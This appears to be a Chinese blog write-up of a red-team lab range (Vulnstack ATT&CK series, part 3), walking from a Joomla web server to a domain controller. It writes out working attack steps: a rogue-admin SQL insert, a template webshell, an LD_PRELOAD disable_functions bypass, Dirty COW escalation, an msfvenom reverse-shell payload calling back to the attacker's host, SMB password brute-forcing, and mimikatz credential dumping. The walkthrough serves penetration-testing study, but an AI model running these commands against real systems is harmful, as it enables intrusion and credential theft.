ATT&CK实战系列——红队实战(三)

一、环境搭建

靶机下载地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/5/

本次环境为黑盒测试,不提供虚拟机账号密码,centos 出网机 ip 为 192.168.1.110,目标是域控内的一份重要文件。

所有主机解压后都是挂起状态,配好网络环境后运行五台机器即可。

ATT&CK实战系列——红队实战(三)_第1张图片

 

二、漏洞利用

2.1修改模板getshell

出网机的 80 端口是一个 joomla! 搭建的网站

ATT&CK实战系列——红队实战(三)_第2张图片

 

直接使用 kali 的 joomscan 工具扫描一下,发现版本为 3.9.12,后台登录目录 http://192.168.1.110/administrator/,敏感文件泄露目录 http://192.168.1.110/configuration.php~

joomscan -u http://192.168.1.110/

ATT&CK实战系列——红队实战(三)_第3张图片

ATT&CK实战系列——红队实战(三)_第4张图片

 

得到一个 mysql 账户 testuser/cvcvgjASD!@

ATT&CK实战系列——红队实战(三)_第5张图片

 

nmap 扫描一下发现 3306 端口开放,使用获得的账户密码远程登录数据库。因为 joomla 可以在后台模板 getshell,所以尝试查找管理员的账号密码登录后台,但是数据表中存储的管理员密码是加密的,需要换一种思路。

ATT&CK实战系列——红队实战(三)_第6张图片

 

根据 joomla 官方文档 https://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F/zh-cn 执行 sql 语句在数据库中添加 admin2/secret 超级管理员,注意 sql 语句修改为目标数据表的前缀。

INSERT INTO `am2zu_users`
   (`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
 'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');

ATT&CK实战系列——红队实战(三)_第7张图片

 

执行语句后在数据表可以看到账户已经成功添加了。

ATT&CK实战系列——红队实战(三)_第8张图片

 

admin2/secret 登录后台,Extensions->Templates->Templates->Beez3 Details and Files->New File 新建文件 shell.php,写入一句话木马。

ATT&CK实战系列——红队实战(三)_第9张图片 

ATT&CK实战系列——红队实战(三)_第10张图片

 

蚁剑连接 webshell。

ATT&CK实战系列——红队实战(三)_第11张图片

 

2.2bypass disable_functions

虚拟终端执行系统命令返回 ret=127,怀疑服务端 disable_functions 禁用了命令执行函数。

ATT&CK实战系列——红队实战(三)_第12张图片

 

phpinfo 查看一下禁用了这些函数,尝试利用LD_PRELOAD绕过。

ATT&CK实战系列——红队实战(三)_第13张图片

 

用蚁剑把 bypass_diablefunc.php 和 bypass_diablefunc_x64.so 上传到目标的同一目录,注意 .so 文件需要根据目标系统架构选择,然后访问 bypass_diablefunc.php,cmd 是执行的命令,outpath是读写权限的目录,sopath是 .so 文件的绝对路径。

工具下载地址: https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

payload 如下:

http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=whoami&outpath=/tmp/baji&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so

ATT&CK实战系列——红队实战(三)_第14张图片

 

查看当前 ip 为 192.168.93.120,内核是 ubuntu,说明真正的 web 服务后端在 ubuntu。

ATT&CK实战系列——红队实战(三)_第15张图片

 

2.3敏感文件泄露

由于 ubuntu 内核比较新,暂时不考虑提权。翻找文件发现 test.txt 给出了一个用户的账号密码。

ATT&CK实战系列——红队实战(三)_第16张图片

 

可以成功登录 centos 出网机。

ATT&CK实战系列——红队实战(三)_第17张图片

 

三、内网渗透

3.1脏牛提权

拿到出网机后想继续横向移动,一般是在跳板机搭建 socks 代理,所以需要将 centos 提权,查看 centos 内核版本刚好在脏牛提权的范围内。

 

将 dirty.c 上传到 centos,gcc -pthread dirty.c -o dirty -lcrypt 命令编译生成 dirty 可执行文件,执行 ./dirty password 提权,exp 下载地址:https://github.com/FireFart/dirtycow

ATT&CK实战系列——红队实战(三)_第18张图片

 

切换 firefart/baji 用户,成功提权。

 

3.2msf上线

攻击机生成 shell.elf,设置监听,将 elf 文件上传至 centos,执行后攻击机成功获得一个 meterpreter。

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f elf > shell.elf

ATT&CK实战系列——红队实战(三)_第19张图片

 

3.3存活主机探测

因为 bypass disable_functions 后得到 ubuntu ip 为 192.168.93.120,所以添加路由,meterpreter 放在后台,进行存活主机探测。

run autoroute -s 192.168.93.0/24
background
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.0/24
exploit

 

得到了三台加入TEST域的 windows 主机

  • 192.168.93.10 windows 2012
  • 192.168.93.20 windows 2008
  • 192.168.93.30 windows 7

 

 

尝试爆破 windows 2008 的本地管理员,参考其他师傅的文章爆出来密码为 123qwe!ASD(我没有包括这个密码的字典...)

use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.20
set SMBUser administrator
set PASS_FILE /usr/share/wordlists/top1000.txt
run

 

3.4内网信息搜集

在爆破密码成功的基础上,使用 msf 开个 socks4 正向代理,配合 proxychains。

use auxiliary/server/socks4a
set srvport 1080
exploit

ATT&CK实战系列——红队实战(三)_第20张图片

 

wmi 出现在所有的 windows 操作系统中,由一组强大的工具集合组成,用于管理本地或远程的 windows 系统。攻击者使用 wmi 攻击时 windows 系统默认不会在日志中记录这些操作,可以做到无日志、攻击脚本无需写入到磁盘,增加了隐蔽性。

wmiexec 执行命令,搜集信息,wmiexec.py 下载地址 https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py

proxychains python3 wmiexec.py -debug 'administrator:[email protected]'

ATT&CK实战系列——红队实战(三)_第21张图片

 

ipconfig /all 知道 dns 服务器即域控是 192.168.93.10。那么基本的内网拓扑也清楚了,一台 centos 反向代理了一个 web,centos 有两个网卡,web 服务后端在 ubuntu 上,三台 windows 组成域环境,ip 分别是 192.168.93.10,192.168.93.20,192.168.93.30,域控为 windows server 2012,ip 为 192.168.93.10。

(反向代理服务器位于用户与目标服务器之间,但是对于用户而言,反向代理服务器就相当于目标服务器,即用户直接访问反向代理服务器就可以获得目标服务器的资源。反向代理的工作原理是,代理服务器来接受客户端的网络访问连接请求,然后服务器将请求有策略的转发给网络中实际工作的业务服务器,并将从业务服务器处理的结果,返回给网络上发起连接请求的客户端。更多解释 https://www.zhihu.com/question/36412304

反向代理优点:

  • 提高了内部服务器的安全
  • 加快了对内部服务器的访问速度
  • 节约了有限的IP资源

ATT&CK实战系列——红队实战(三)_第22张图片

 

tasklist /V 查看进程(显示对应用户),发现TEST域进程,可以尝试抓密码。

ATT&CK实战系列——红队实战(三)_第23张图片

 

3.5mimikatz获取账号密码

kali 使用 smbclient 通过代理连接 windows server 2008 上传 mimikatz。下载地址 https://github.com/gentilkiwi/mimikatz/releases

proxychains smbclient //192.168.93.20/C$ -U administrator
put mimikatz.exe

ATT&CK实战系列——红队实战(三)_第24张图片

 

wmiexec 远程执行 mimikatz 成功得到域管理员密码。

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > log.log

ATT&CK实战系列——红队实战(三)_第25张图片

 

3.6ipc远程连接

IPC$(Internet Process Connection)是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$连接者可以与目标主机建立一个连接,得到目标主机上的目录结构、用户列表等信息。

利用条件:

  1. 管理员开启了默认共享
  2. 139或445端口开放

 

ipc 远程连接读 flag.txt。

net use \\192.168.93.10\admin$ zxcASDqw123!! /user:test\administrator   #系统默认路径c:\windows\下
dir \\192.168.93.10\C$\users\administrator\Documents
type \\192.168.93.10\C$\users\administrator\Documents\flag.txt

ATT&CK实战系列——红队实战(三)_第26张图片

 

四、总结

通过这个靶机了解了一些新知识,实验了几个听说过但是还没试过的经典操作。如果有问题欢迎师傅们批评指正。

总结还想写一点点别的,现在是大三暑假,九月份就秋招了,喜欢渗透但是技术还挺菜的hhhh。希望在毕业后可以做渗透测试的工作,很想很想喜欢的事可以成为工作啊:)

 

 

参考文章:

https://www.cnblogs.com/PANDA-Mosen/p/13118679.html

https://www.freebuf.com/web/192052.html

https://glotozz.github.io/2020/05/19/vulstack-3/

https://xz.aliyun.com/t/6988

 

你可能感兴趣的:(ATT&CK实战系列——红队实战(三))